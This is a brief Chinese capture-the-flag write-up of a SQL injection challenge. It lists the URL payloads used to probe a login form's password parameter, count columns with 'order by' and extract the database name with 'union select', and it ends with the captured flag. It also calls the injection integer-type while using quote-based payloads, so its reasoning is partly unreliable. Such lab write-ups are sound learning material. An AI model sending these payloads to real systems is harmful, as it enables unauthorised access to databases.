既然是sql注入,那就按照注入流程来
1、先找注入类型
payload:?username=admin&password=1
payload:?username=admin&password=2-1 //判断页面是否相同
两次注入结构页面相同,由此判断为整形注入
2、找回显位
payload:?username=admin&password=1' order by 3%23
payload:?username=admin&password=1' order by 4%23
输入3页面没变化,输入4页面报错,所以回显位为3
3、构造注入语句
payload:?username=admin&password=1' union select 1,2,database()%23
很好,啥过滤机制都没有,测试了一下直接就拿到了flag
flag{dbfd0784-f217-4b77-a43a-0bf131025152}
总结:
这道题还是挺容易的,关于sql注入题只要按照注入流程来就可以了
在能用union联合查询的情况下,最好还是用union联合查询
如有不足之处,请予指正!